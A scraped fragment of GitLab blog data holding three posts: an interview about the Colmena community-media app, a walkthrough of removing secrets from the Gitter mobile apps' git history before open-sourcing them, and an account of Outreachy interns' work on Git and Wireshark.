Behrenshausen\"}],\n        \"datePublished\": \"2023-09-27\",\n      }",{"title":4286,"description":4287,"authors":4292,"heroImage":4288,"date":4293,"body":4294,"category":10,"tags":4295},[2909],"2023-09-27","\nIn an increasingly crowded media ecosystem, finding an audience — and being heard — can be difficult, especially for indigenous communities with limited access to global platforms. But using the open source [Colmena project](https://blog.colmena.media/), anyone can collaboratively plan, record, edit, and distribute hyperlocal and community-focused media products that reach audiences worldwide.\n\nThe Colmena project (which takes its name from the Spanish word for \"beehive\") is a [GitLab Open Source Partner](https://go.gitlab.com/030Ue3). I recently spoke with community members [Nils Brock](https://gitlab.com/nilsbrock), [Vivienne Gager](https://gitlab.com/vivienne.maria), and [Santiago Garcia Gago](https://gitlab.com/SantiagoGG) about how they use GitLab to help people find their voices, tell their stories, and help their communities.\n\nWe conducted our interview iteratively, asynchronously, and collaboratively [via merge request](https://gitlab.com/gitlab-com/marketing/developer-relations/open-source-program/gitlab-open-source-partners/publications-and-presentations/-/merge_requests/9).\n\n**Welcome to the the GitLab Open Source Partners community! We're so delighted you're here. Tell our readers more about Colmena. What is it?**\n\nBrock, Gager, and Garcia Gago: Colmena is open technology for journalists. Think of it as a mobile digital newsroom for field reporters and media outlets. Our software enables users to create and share content. But here is what's special: The solution is developed together with local and community media from the Global South, is free to use, and is completely open source. \n\nThe backbone of Colmena is a custom-made digital newsroom for production teams, which includes all essential features for content creation, with special consideration for audio productions and transmissions. So we have audio streaming and podcast production workflows, a mobile recording option (face-to-face and online interviews), and mobile text and audio editing tools. All tools are set up for cross-media collaboration and are highly customizable. It's also important to note that Colmena is already available in eight languages, including English, Arabic, and Ukranian.\n\nBut Colmena doesn't need to stop there. We are always open for new suggestions.\n\n**Where can users download Colmena? How can they use it?**\n\nAs a lightweight app (a so-called \"progressive web application,\" or PWA), Colmena performs on a wide range of mobile and desktop devices for easy online/offline creation and collaboration. On the server side, we have established a secure and federated architecture, offering cloud-based sharing, storage, and publishing wherever you want, be it your own website on social media or other platforms.\n\n**How did the project get started? What mission, vision, and values drive it?**\n\nThe initiative [was born as a response to the COVID-19 pandemic](https://p.dw.com/p/3ydGf), and it's led by DW Akademie and the Mexican NGO Redes por la Diversidad, Equidad y Sustentabilidad A.C. The project is supported by the German Federal Ministry of Economic development and Cooperation (BMZ) as part of the Global Crisis Initiative (GKI).\n\n[Our vision](https://p.dw.com/p/40B1S) is to provide safe and inclusive digital tools for the communication, creation, and sharing of human rights-based content, to defend and extend freedom of expression to all parts of the world. And as the driving force behind the Colmena project, our mission is to sustainably maintain and develop the open source Colmena software as a commons, based on the needs of community-centered communication, networking, and media practices of the global majority.\n\nCollaboration is an important aspect of Colmena's development model. We develop the application working closely with [media partners](https://p.dw.com/p/4B1ID), to whom we refer as \"communities of practice\" (CoPs). Generally, one or two members of each CoP serve as representatives of their media outlets in the Colmena project. One might say they have the most important role in the project. Colmena is a collective response to their needs, and we want to design it to overcome challenges they face.\n\n**How does the Colmena project use GitLab to accomplish all this?**\n\nWe use of GitLab for the Colmena Project in three different ways. The first use is quite technical: We use it as [a development platform and code repository](https://git.colmena.network/maia). All repositories for the Colmena PWA are public; we keep only the \"infra\" project private (since that's where the data of our development servers are stored).\n\nSecondly, [GitLab's wiki feature](https://docs.gitlab.com/ee/user/project/wiki/) serves us quite well as a documentation space for both our general work team and additional collaborators, who are the coordinators of our CoPs and the media partners involved in the co-creation of Colmena. [In the wiki](https://git.colmena.network/maia/frontend/-/wikis/home), for instance, we socialize information for the onboarding of new team members — like general information on the project, additional literature, and manuals of the tools we use in the project and documentation of conducted workshops for internal knowledge sharing. Before we had this documentation stored in a Nextcloud instance, but using GitLab for this work creates deeper understanding between the users, coordinators, and the development team about Colmena development processes and workflows.\n\nFinally, we maintain [an open \"support\" project](https://git.colmena.network/maia/support/-/issues?scope=all&state=all). In this project, the coordinators of the CoPs, who work with 30 media outlets from different countries, collect suggestions or detected bugs and report them. The development team evaluates and responds to each of them. If they need specialized attention — for example, development of a new feature or some bug fixing — we move these these issues to the corresponding development projects. We are currently migrating this repository from our self-hosted instance [to Gitlab.com](https://gitlab.com/colmena-project/communities-of-practice).\n\n**Why did the Colmena project choose GitLab as its development platform?**\n\nColmena was born as a free and open source software project; many of the developers and members of the coordination team have been involved in free software and community media projects before (for example, in the [Network of Community Radios and Free Software](https://liberaturadio.org/)). Our project always wanted to maintain this philosophy when looking for suitable software development platforms. That's why we chose GitLab: It shares our ideals regarding software development and knowledge sharing. Furthermore, Colmena is proud to use GitLab together with other free software projects that we have been using for ages, such as [Inkscape, Debian, and VLC](https://go.gitlab.com/030Ue3).\n\nBesides the shared philosophy, however, GitLab offers us technical options that other platforms do not. For example, it can be self-hosted, allows for management of groups and subgroups is, and features integrated planning tools like [epics](https://docs.gitlab.com/ee/user/group/epics/) and [roadmaps](https://docs.gitlab.com/ee/user/group/roadmap/) that really benefit the development process.\n\n**How can potential contributors learn more about Colmena?**\n\nIf you want to get in touch with us, please visit [our website](https://colmena.media) or write the team directly at `info@colmena.media`. You can also [browse the project and contirbute on GitLab](https://gitlab.com/colmena-project).\n\n## Watch the webcast \nWatch our interview with the Colmena project.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/4wIg2M1EoHI\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Learn more\nThe [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n",[9,267,1099],{"slug":4297,"featured":6,"template":689},"open-source-tools-for-citizen-journalists","content:en-us:blog:open-source-tools-for-citizen-journalists.yml","Open Source Tools For Citizen Journalists","en-us/blog/open-source-tools-for-citizen-journalists.yml","en-us/blog/open-source-tools-for-citizen-journalists",{"_path":4303,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4304,"content":4310,"config":4316,"_id":4318,"_type":14,"title":4319,"_source":16,"_file":4320,"_stem":4321,"_extension":19},"/en-us/blog/open-sourcing-the-gitter-mobile-apps",{"title":4305,"description":4306,"ogTitle":4305,"ogDescription":4306,"noIndex":6,"ogImage":4307,"ogUrl":4308,"ogSiteName":673,"ogType":674,"canonicalUrls":4308,"schema":4309},"Open-sourcing the Gitter mobile apps","Learn how we open sourced the Android and iOS Gitter apps.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666717/Blog/Hero%20Images/cover-image.jpg","https://about.gitlab.com/blog/open-sourcing-the-gitter-mobile-apps","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Open-sourcing the Gitter mobile apps\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Eric Eastwood\"}],\n        \"datePublished\": \"2019-11-22\",\n      }",{"title":4305,"description":4306,"authors":4311,"heroImage":4307,"date":4313,"body":4314,"category":801,"tags":4315},[4312],"Eric Eastwood","2019-11-22","\nBefore we acquired Gitter most every part of Gitter was private/closed-source. The main [webapp](https://gitlab.com/gitlab-org/gitter/webapp) was open-sourced in June 2017 and got both mobile [Android](https://gitlab.com/gitlab-org/gitter/gitter-android-app)/[iOS](https://gitlab.com/gitlab-org/gitter/gitter-ios-app) apps open sourced in September 2018. If you would like to come help out, feel free to send us a merge request! This blog post will go over some the technical details of making the projects available for anyone to contribute.\n\nHere is the basic overview:\n\n1.  Find secrets in the current state of the project (don't worry about the commit history) and move to some config that isn't tracked in the repo.\n1.  Find/remove secrets throughout the whole repo commit history.\n1.  Make the project public 🎉\n1.  Caveats:\n    - Because we are rewriting the git history, I don't know of a way to keep merge requests/pull requests because the MRs reference the old commit hashes.\n\nQuick navigation:\n\n- [Jump to open sourcing Android](#android)\n- [Jump to open sourcing iOS](#ios)\n\n## Android\n\nIf you want to check out the full project and final result, you can check out the [project on GitLab](https://gitlab.com/gitlab-org/gitter/gitter-android-app) ([open-sourced 2018-8-8](https://twitter.com/gitchat/status/1027293167471812611)).\n\nTo start out, we used the [GitHub to GitLab project import](https://docs.gitlab.com/ee/user/project/import/github.html) to move the private GitHub project over to GitLab. We named it `gitter-android-app2` so that later on we could create the actual clean public project without any of the orphaned git references that may potentially leak.\n\n### Finding secrets\n\n[`truffleHog`](https://github.com/dxa4481/truffleHog) will search for high entropy strings (like tokens/passwords) through the entire git repo history. It's also useful to find all the potential areas where secrets may still exist in the current state of the project. Some sticky points we encountered while using include:\n\n- \"I wish we could just search the current state of the project instead of all git history (the `--max_depth=2` argument will just make it search the diff of the latest commit)\" [dxa4481/truffleHog#92](https://github.com/dxa4481/truffleHog/issues/92).\n- \"The output will show the entire diff for the triggered commit which is a bit burdensome to see exactly what is wrong. The JSON output `--json` is sometimes easier to understand\" [https://github.com/dxa4481/truffleHog/issues/58](https://github.com/dxa4481/truffleHog/issues/58) or [dxa4481/truffleHog#102](https://github.com/dxa4481/truffleHog/issues/102).\n\n### Moving secrets to untracked config\n\nOnce we figure out where all of the secrets are we need a config/variable solution that isn't tracked by git but still lets them be available when building. We also wanted the solution to work in GitLab CI for some sanity builds/testing. There are lots of good articles on this topic:\n\n- [Remove private signing information from your project](https://developer.android.com/studio/build/gradle-tips#remove-private-signing-information-from-your-project)\n- [Keeping Your Android Project’s Secrets Secret](https://medium.com/@geocohn/keeping-your-android-projects-secrets-secret-393b8855765d)\n- [Hiding Secrets in Android Apps](https://rammic.github.io/2015/07/28/hiding-secrets-in-android-apps/)\n- [Keeping secrets in an Android Application](https://joshmcarthur.com/2014/02/16/keeping-secrets-in-an-android-application.html)\n- [Android: Loading API Keys and other secrets from properties file using gradle](https://gist.github.com/curioustechizen/9f7d745f9f5f51355bd6)\n- [How can I keep API keys out of source control?](https://arstechnica.com/information-technology/2013/12/how-can-i-keep-api-keys-out-of-source-control/)\n\nOur solution is completely based on the information in these articles. We chose to go the route of defining things in a `secrets.properties` file which can easily be read in the Gradle build script which handles the build even when using Android Studio. If the `secrets.properties` file doesn't exist (like in CI), it will try to read the secrets from [environment variables which can easily be supplied in the project settings](https://docs.gitlab.com/ee/ci/variables/).\n\n`secerts.properties`\n\n```properties\n# Visit https://developer.gitter.im/apps (sign in) and create a new app\n# Name: my-gitter-android-app (can be anything)\n# Redirect URL: https://gitter.im/login/oauth/callback\noauth_client_id=\"...\"\noauth_client_secret=\"...\"\noauth_redirect_uri=\"https://gitter.im/login/oauth/callback\"\n```\n\n`build.gradle`\n\n```gradle\napply plugin: 'com.android.application'\n\n// Try reading secrets from file\ndef secretsPropertiesFile = rootProject.file(\"secrets.properties\")\ndef secretProperties = new Properties()\nif (secretsPropertiesFile.exists()) {\n    secretProperties.load(new FileInputStream(secretsPropertiesFile))\n}\n// Otherwise read from environment variables, this happens in CI\nelse {\n    secretProperties.setProperty(\"oauth_client_id\", \"\\\"${System.getenv('oauth_client_id')}\\\"\")\n    secretProperties.setProperty(\"oauth_client_secret\", \"\\\"${System.getenv('oauth_client_secret')}\\\"\")\n    secretProperties.setProperty(\"oauth_redirect_uri\", \"\\\"${System.getenv('oauth_redirect_uri')}\\\"\")\n}\n\nandroid {\n    ...\n\n    defaultConfig {\n        ...\n\n        buildConfigField(\"String\", \"oauth_client_id\", \"${secretProperties['oauth_client_id']}\")\n        buildConfigField(\"String\", \"oauth_client_secret\", \"${secretProperties['oauth_client_secret']}\")\n        buildConfigField(\"String\", \"oauth_redirect_uri\", \"${secretProperties['oauth_redirect_uri']}\")\n    }\n    ...\n}\n```\n\nUse the config variables in the Java app:\n\n```java\nimport im.gitter.gitter.BuildConfig;\n\nBuildConfig.oauth_client_id;\nBuildConfig.oauth_client_secret;\nBuildConfig.oauth_redirect_uri;\n```\n\n#### Removing compiled assets\n\nWe use a `WebView` to display the HTML markdown messages in the chat room. This view uses assets built from the main [`webapp` project](https://gitlab.com/gitlab-org/gitter/webapp). Because these assets had some inlined production [`webapp`](https://gitlab.com/gitlab-org/gitter/webapp) secrets that whole directory needed to be removed.\n\nInitially, we opted to have the developer build these assets with their own secrets and symlink the build output directory. The [community made this even simpler](https://gitlab.com/gitlab-org/gitter/gitter-android-app/merge_requests/113), so now there is just a Gradle task to run which fetches the latest build we have available from the `webapp` GitLab CI.\n\n### Removing secrets from the repo history\n\nFrom your `truffleHog` results earlier, you should know where secrets were stored throughout the history. We can use [BFG Repo-Cleaner](https://rtyley.github.io/bfg-repo-cleaner/) to remove and rewrite the repo history quickly.\n\nWhen using BFG, I wanted just to rewrite all of the sensitive values in `app/src/main/res/values/settings.xml` instead of completely removing them, but rewriting isn't an option with BFG so I went ahead with deleting it and recreated it in a commit afterwards. 🤷\n\nFor the Android app, here are the BFG commands I used,\n\n- Remove `app/src/main/assets/www/`\n  - `java -jar \"bfg.jar\" --delete-folders www`\n- Remove `app/src/main/res/values/settings.xml`\n  - `java -jar \"bfg.jar\" --delete-files settings.xml`\n- Remove sensitive strings where we can't just remove the whole file (collected from `truffleHog` results)\n  - `java -jar \"bfg.jar\" --replace-text \"gitter-android-bad-words.txt\"`\n\nAfter you think you removed all the secrets, it's best to run `truffleHog` again just to make sure no secrets are leftover. 😉\n\n### Make it public\n\nNow it's time to update your `readme` with some setup instruction so the community knows how to contribute.\n\nThis is the scary part 😅. Go to **Project settings** > **General** > **Permissions** > set **Project visibility** as **Public**. You can [read more about project access here](https://docs.gitlab.com/ee/public_access/public_access.html).\n\nCurious about how to setup builds in GitLab CI? [Learn more from this blog post](/blog/setting-up-gitlab-ci-for-android-projects/), which was what we used to set it up for our projects.\n\nYou can even learn how we [automated the release process so we can publish straight to the Google Play Store from GitLab CI via fastlane 🚀](/blog/android-publishing-with-gitlab-and-fastlane/).\n\n## iOS\n\nIf you want to see the full project and final result, you can check out the [project on GitLab](https://gitlab.com/gitlab-org/gitter/gitter-ios-app) ([open-sourced 2018-9-18](https://twitter.com/gitchat/status/1041795909103898625)).\n\nThe same concepts apply from the Android section. We create a separate private project, `gitter-ios-app2`, where we can work and later on, we can create the actual clean public project(`gitter-ios-app`) without any of the orphaned git references that could leak.\n\n### Finding secrets\n\n`truffleHog` didn't work well in the iOS project because there was a bunch of generated XCode files that had file hashes (high entropy strings which truffleHog looks for) – which meant every commit was listed. 🤦‍ Instead of trying to find something to filter the results down or get another tool, I decided just search manually. Here is the list of things we looked for:\n\n- `token`\n- `secret`\n- `key`\n- `cert`\n- `api`\n- `pw`\n- `password`\n\nI used this directory filter when `Ctrl + f` those strings above to avoid finding things outside of the repo itself (copy-paste for Atom editor): `!Common/,!Libraries,!Gitter/www,!Pods/,!xctool`\n\n### Moving secrets to untracked config\n\nThe iOS app uses a few git sub-modules which we also had to check for secrets before making them public. It turned out only one of the sub-modules – [`troupeobjccommon`](https://gitlab.com/gitlab-org/gitter/troupeobjccommon) – had secrets of it's own so I ran through the same secret removal process.\n\nWe had the same OAuth secrets in the main part of the iOS app, but since `troupeobjccommon` was also trying to handle OAuth secret settings, we opted for putting the new logic in `troupeobjccommon` to avoid having to refactor whatever other downstream code that uses the same submodule (like the macOS desktop app).\n\nHere are some articles around handling secrets in an iOS project,\n\n- [Secret variables in Xcode AND your CI for fun and profit 💌](https://medium.com/flawless-app-stories/secret-variables-in-xcode-and-your-ci-for-fun-and-profit-d387a50475d7)\n- [Secrets Management in iOS Applications](https://medium.com/@jules2689/secrets-management-in-ios-applications-52795c254ec1)\n\nSince iOS apps can only be built on macOS and we don't have any macOS GitLab CI runners, our solution doesn't have to be CI compatible. You can track [this issue for shared macOS GitLab CI runners](https://gitlab.com/gitlab-com/gl-infra/infrastructure/issues/5720).\n\n`Gitter/GitterSecrets-Dev.plist`\n\n```xml\n\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n\u003Cplist version=\"1.0\">\n\u003Cdict>\n  \u003C!--\n  Visit https://developer.gitter.im/apps (sign in) and create a new app\n  Name: my-gitter-ios-app (can be anything)\n  Redirect URL: https://gitter.im/login/oauth/callback\n  -->\n  \u003Ckey>OAuthClientId\u003C/key>\n  \u003Cstring>\u003C/string>\n  \u003Ckey>OAuthClientSecret\u003C/key>\n  \u003Cstring>\u003C/string>\n  \u003Ckey>OAuthCallback\u003C/key>\n  \u003Cstring>https://gitter.im/login/oauth/callback\u003C/string>\n\u003C/dict>\n\u003C/plist>\n```\n\n[`troupeobjccommon`](https://gitlab.com/gitlab-org/gitter/troupeobjccommon) is in Objective-C\n\n`TRAppSettings.h`\n\n```h\n#import \u003CFoundation/Foundation.h>\n\n@interface TRAppSettings : NSObject\n\n+ (TRAppSettings *) sharedInstance;\n\n- (NSString *) clientID;\n\n- (NSString *) clientSecret;\n\n- (NSString *) oauthScope;\n\n@end\n```\n\n`TRAppSettings.m`\n\n```objc\n@interface TRAppSettings ()\n\n@property (strong, nonatomic) NSUserDefaults *secrets;\n\n@end\n\nstatic TRAppSettings *sharedAppSettingsSingleton;\n\n@implementation TRAppSettings {\n    int firstRunPostUpdate;\n}\n\n+ (void)initialize\n{\n    static BOOL initialized = NO;\n    if(!initialized)\n    {\n        initialized = YES;\n        sharedAppSettingsSingleton = [[TRAppSettings alloc] init];\n    }\n\n    NSLog(@\"Pulling secrets from SECRETS_PLIST = %@.plist\", SECRETS_PLIST);\n}\n\n+ (TRAppSettings *) sharedInstance\n{\n    return sharedAppSettingsSingleton;\n}\n\n- (id)init {\n    NSString *troupeSecretsPath = [[NSBundle mainBundle] pathForResource:\"GitterSecrets-Dev\" ofType:@\"plist\"];\n    if(troupeSecretsPath == nil) {\n        NSString *failureReason = [NSString stringWithFormat:@\"Gitter secrets file not found in bundle: %@.plist. You probably need to add it to the `Gitter/Supporting Files` in Xcode navigator\", SECRETS_PLIST];\n        NSException* exception = [NSException\n            exceptionWithName:@\"FileNotFoundException\"\n            reason:failureReason\n            userInfo:nil];\n\n        NSLog(@\"%@\", failureReason);\n\n        [exception raise];\n    }\n    NSDictionary *troupeSecrets = [NSDictionary dictionaryWithContentsOfFile:troupeSecretsPath];\n\n    self.secrets = [NSUserDefaults standardUserDefaults];\n    [self.secrets registerDefaults:troupeSecrets];\n}\n\n- (NSString *) clientID {\n    return [self.secrets stringForKey:@\"OAuthClientId\"];\n}\n\n- (NSString *) clientSecret {\n    return [self.secrets stringForKey:@\"OAuthClientSecret\"];\n}\n\n- (NSString *)oauthScope {\n    return [self.secrets stringForKey:@\"OAuthCallback\"];\n}\n```\n\nUsage in the Swift app:\n\n```swift\nprivate let appSettings = TRAppSettings.sharedInstance()\n\nappSettings!.clientID()\nappSettings!.clientSecret()\nappSettings!.oauthScope()\n```\n\n### Adding in GitLab CI\n\nIf you're interested in setting up automated builds and publish releases to the Apple App Store from GitLab CI, you can learn how [blog post about using fastlane](/blog/ios-publishing-with-gitlab-and-fastlane/).\n\n### Removing secrets from the repo history\n\nWe didn't have a complete picture of what to remove because `truffleHog` didn't work well, so we didn't use BFG Repo-Cleaner. To remove secrets from the git repo history, we just squashed all of the history into a single commit.\n\n## Life after open sourcing apps\n\nWe have some [thoughts of deprecating the Android/iOS apps](https://gitlab.com/gitlab-org/gitter/webapp/issues/2281) but the community has been great to keep the apps alive so far. We released a couple versions of each app including [dark theme](https://gitlab.com/gitlab-org/gitter/gitter-android-app/merge_requests/2) and [GitLab sign-in](https://gitlab.com/gitlab-org/gitter/gitter-android-app/merge_requests/112) for Android and a bunch of technical debt and fixes for iOS, including removing the deprecated [`SlackTextViewController`](https://gitlab.com/gitlab-org/gitter/gitter-ios-app/merge_requests/8) (and we are intensely working on incorporating the new [`SlackWysiwygInputController`](https://goo.gl/7NDM3x) 😜).\n\nThe [Android](https://gitlab.com/gitlab-org/gitter/gitter-android-app)/[iOS](https://gitlab.com/gitlab-org/gitter/gitter-ios-app) apps could benefit from a lot of polish and fixes, so if you see anything particularly annoying, we would love to review and merge your updates!\n\nCover image by [Nate Johnston](https://unsplash.com/@natejohnston) on [Unsplash](https://unsplash.com/photos/DkCydKeaLV8).\n{: .note}\n",[9,779,708,109],{"slug":4317,"featured":6,"template":689},"open-sourcing-the-gitter-mobile-apps","content:en-us:blog:open-sourcing-the-gitter-mobile-apps.yml","Open Sourcing The Gitter Mobile Apps","en-us/blog/open-sourcing-the-gitter-mobile-apps.yml","en-us/blog/open-sourcing-the-gitter-mobile-apps",{"_path":4323,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4324,"content":4329,"config":4336,"_id":4338,"_type":14,"title":4339,"_source":16,"_file":4340,"_stem":4341,"_extension":19},"/en-us/blog/outreachy-sponsorship-winter-2020",{"title":4325,"description":4326,"ogTitle":4325,"ogDescription":4326,"noIndex":6,"ogImage":3320,"ogUrl":4327,"ogSiteName":673,"ogType":674,"canonicalUrls":4327,"schema":4328},"Technology internships meet open source in Outreachy","Inside Outreachy technology internships, where participants work on Git.","https://about.gitlab.com/blog/outreachy-sponsorship-winter-2020","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Technology internships meet open source in Outreachy\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Joey Salazar\"},{\"@type\":\"Person\",\"name\":\"Charvi Mendiratta\"},{\"@type\":\"Person\",\"name\":\"Nuritzi Sanchez\"},{\"@type\":\"Person\",\"name\":\"Christian Couder\"}],\n        \"datePublished\": \"2021-04-15\",\n      }",{"title":4325,"description":4326,"authors":4330,"heroImage":3320,"date":4333,"body":4334,"category":10,"tags":4335},[4331,4332,2773,1492],"Joey Salazar","Charvi Mendiratta","2021-04-15","\n\nAs an enthusiastic participant in the [open source](/blog/innersourcing-using-the-open-source-workflow-to-improve-collaboration-within-an-organization/) community, we were excited to participate in the [Outreachy technology internships program](https://www.outreachy.org/) again this year, which focuses on women and underrepresented groups. It's a way GitLab can give back, and as a bonus, Outreachy's principles intersect with [our Diversity, Inclusion and Belonging value](https://handbook.gitlab.com/handbook/values/#diversity-inclusion).\n\n## About the Outreachy program\n\nInitially, Outreachy began as the Open Source Program for Women (OPW) at [GNOME](https://www.gnome.org/about-us/). The program was successful and grew quickly. Today, Outreachy has grown into the largest global technology internships program that provides opportunities for women and underrepresented groups to work on open source projects.\n\nCurrently, Outreachy is independently organized with the help of many volunteers, or sponsored help. For example, [Cindy Pallares](/company/team/#cindy) is a GitLab employee and helps with organizing Outreachy as a site reliability engineer.\n\nOutreachy is a paid technology internship program that runs twice a year for three months. During that time, interns can work in areas like programming, user experience, documentation, illustration and graphic design, or data science. In this technology internship program, participants work remotely with experienced mentors from prominent FOSS communities like Git, Mozilla, Linux kernel, GNOME, Wikimedia, and many others.\n\nOne of the benefits of the Outreachy technology internship is that the interns do not need to be students. It's a great opportunity for people who are coming back into the workforce after a hiatus, or who are navigating a career change into tech. This technology internship program is unique because it incorporates skill sets beyond engineering – which creates a broader range of skill sets represented in the open source world. The Outreachy internship is remote, making it more relevant than ever during the pandemic by helping interns gain experience working on an all-remote team.\n\nGitLab is one of the organizations that sponsors the Outreachy technology internship program, and we hope that by sharing our experience we can encourage more tech organizations to join us in participating in Outreachy as [corporate sponsors](https://www.outreachy.org/sponsor/).\n\n## Outreachy interns work on Git\n\nMore than 90% of the professional applications created today are built using open source components, according to a [2020 Tidelift survey](https://cdn2.hubspot.net/hubfs/4008838/Resources/The-Tidelift-guide-to-managed-open-source.pdf?utm_source=hs_automation&utm_medium=email&utm_content=66640714). One of the fundamental open source technologies we leverage at GitLab is the [Git project](https://git-scm.com/), so we chose to sponsor an Outreachy intern to work there.\n\n> GitLab sponsors an Outreachy intern to work on one of the most critical open source technologies that it relies on: The Git project.\n\n[Christian Couder](/company/team/#chriscool), senior backend software engineer at GitLab, who works on Git full-time, introduced the [GitLab Developer Relations team](/handbook/marketing/developer-relations/) to the Outreachy opportunity during the winter of 2017-2018 round. An experienced mentor for other programs like Google Summer of Code, Christian thought that it would be great to mentor an intern through the Outreachy program as well. Since the number of mentored interns and the need to sponsor them increased over the years, GitLab has sponsored an Outreachy intern for the Git project since winter 2019-2020.\n\nOutreachy at Git works similarly to the [Google Summer of Code (GSoC) program](https://summerofcode.withgoogle.com/). Git participates in GSoC in the summer and Outreachy in the winter. These programs consist of the Git project finding mentors and project ideas for individual participants to work on. Then there is a selection step, which includes working on a micro-project (a small code-related change), as part of the application process, and writing a proposal for a project to work on during the internship. After the interns are announced, they begin to work on their projects. Typically, Git tries to provide two mentors per intern to provide the best possible experience for the mentee.\n\n> The mentors used to be long-time Git developers, but more and more Outreachy and GSoC alumni have returned to the program as mentors, indicating the power of these programs.\n\nThe mentors volunteer some time each week to help their mentees by answering questions, providing suggestions, reviewing contributions, etc. Contributions still have to be sent by participants to the Git mailing list as patches. Then, other experienced Git contributors review the contributions before they are integrated into the Git code base by [Junio Hamano](https://www.linkedin.com/in/gitster), the Git maintainer.\n\n## Meet the Outreachy interns\n\nWe met with the Outreachy interns at Git to learn more about their experience participating in the winter 2020-2021 Outreachy technology internship program. In the next section, the Outreachy interns shared what the experience was like, in their own words.\n\n### Charvi Mendiratta: A self-taught programmer with an interest in robotics\n\n_This section was written by Charvi._\n\n> I am a recent graduate from the electronics field in India, a self-taught programmer with internship experiences working on mobile robotics projects, and I aim to pursue a career as a software developer. - [Charvi](https://charvi-077.github.io/about/)\n\nIt turned out to be difficult to find a job as a software developer because of my background in electronics and because I lacked professional programming skills. Also, there are very few job opportunities for recent graduates in software engineering roles, especially those related to robotics.\n\nDue to these challenges, I decided to try out open source in parallel with brushing up my skills. I supposed that open source contributions would be the best way to get hands-on experience with projects that required real-life problem solving skills, and I wanted to learn to convert my code into deployable software. That's why I decided to apply to the Outreachy program.\n\nBesides wanting to learn more about creating enterprise-grade code, I have always been interested in being part of the open source community. I first learned about open source work culture from my college programming community. I remember the old days when I attended an open source event called '[Software Freedom Day](http://www.softwarefreedomday.in/)' at my university. That's where I first learned about different open source programs like Outreachy.\n\n> Over the course of my three month internship, I worked on cleaning up and improving the Git interactive rebase, which is a useful git command to rewrite or modify the commit history. - Charvi\n\n#### About Charvi's Outreachy project\n\nMy work on Git's interactive rebase, which was mentored by Christian and [Phillip Wood](https://git.github.io/rev_news/2019/11/20/edition-57/), will help users who want to rework their commits and make it easier for users to improve the quality of their contributions. When teams practice code review, for example, it's very useful to rework commits to make them better or easier to understand before a reviewer steps in, and to fix them when reviews point to problems.\n\nFirst, I added the options '-c' and '-C' to the present `fixup` command in the interactive rebase. The `fixup` command adds the functionality to edit the commit message of the specific commit listed in the interactive rebase (see [merged patches](https://lore.kernel.org/git/20210129182050.26143-1-charvi077@gmail.com/)). This work is based on the [original patch series](https://github.com/phillipwood/git/commits/wip/rebase-amend), started by Phillip.\n\nThen, I worked on the [follow-up patches](https://lore.kernel.org/git/20210210113650.19715-1-charvi077@gmail.com/) and introduced some improvements after discussing the user interface of the added options with the Git community. Next, I worked on adding the new feature to `git commit --fixup` that allows to prepare the \"amend!\" and \"reword!\" commit, as an alternative to the present `fixup!` commit. It works with `git commit --autosquash` and will help to fix-up the content and commit message of the specific commit from the command line (see [merged patches](https://lore.kernel.org/git/20210315075435.18229-1-charvi077@gmail.com/)).\n\n### Joey Salazar: An engineer with international experience\n\n_This section was written by Joey._\n\n> As a female engineer from Costa Rica, who graduated in China through a full scholarship, it has been a challenge to find opportunities with mentoring for my transition from IT into programming. - [Joey](https://about.me/gomezsalazar-jogebeth)\n\nEven though I worked five years in IT (OS, networking, and storage), and was certified in Linux+ and CCNA through self-learning before beginning my software engineering studies, most companies and organizations seem eager to hire mid-senior level developers. Very few seem willing to invest in helping people get to that level, or in finding ways to build on any preexisting IT experience. As an open source advocate, it was through my research of open source technologies and the open source space that I came across community groups such as [WomenWhoCode](https://www.womenwhocode.com/), which was where I learned about Outreachy.\n\n#### About Joey's Outreachy project\n\n> My favorite thing to work on, probably because of my [background in privacy advocacy](https://www.techdirt.com/articles/20200622/08142044757/long-past-time-to-encrypt-entire-dns.shtml), was adding the foundations of HTTPS connection support for the Git protocol by following up on [a patch](https://gitlab.com/wireshark/wireshark/-/merge_requests/1946) started (and shared by) long-time Wireshark developer, [Richard Sharpe](https://sharkfestus.wireshark.org/bios/richard-sharpe). –  Joey\n\nMy work on Git protocol support in [Wireshark](https://www.wireshark.org/), which was mentored by Git developers employed by Google, [Emily Shaffer](https://nasamuffin.dev) and Jonathan Nieder, will help users debugging Git or any Git using software (like GitLab). This work helps production teams or developers understand what's going on between Git clients and servers, so they can better troubleshoot or optimize how Git works. This project will help demystify Git and its inner workings in the tech community.\n\nAs Wireshark is \"the world’s foremost and widely-used network protocol analyzer\", improving the way it dissects and presents the Git protocol to the user is helpful and important. Traffic interception and analysis is part of many user's workflows – from students, to researchers and advocates. For a few years, Git's dissector in Wireshark was bare-bones, and supported only raw traffic transmitted over regular TCP transport – my work is helping to change that.\n\nBy starting with [base functionality](https://gitlab.com/wireshark/wireshark/-/merge_requests/1922) and building on top of other member's work, Joey and her mentors added parsing of the multiplexing ([sideband](https://gitlab.com/wireshark/wireshark/-/merge_requests/1313)) version in use (if any) to Wireshark's dissector for the Git protocol. Next, they [added parsing for the specific version](https://gitlab.com/wireshark/wireshark/-/merge_requests/1714) of the Git protocol that is used, following up on [an MR to parse the Git protocol version](https://gitlab.com/wireshark/wireshark/-/merge_requests/805), did some refactoring on [an MR to refactor Git packet line dissector](https://gitlab.com/wireshark/wireshark/-/merge_requests/1942), and began the foundations for Git protocol's [testing suite](https://gitlab.com/wireshark/wireshark/-/merge_requests/2142).\n\nToday the Git dissector now includes more functionality and error handling, as well as HTTPS transport support – all of which was done through GitLab's platform.\n\n## Outreachy 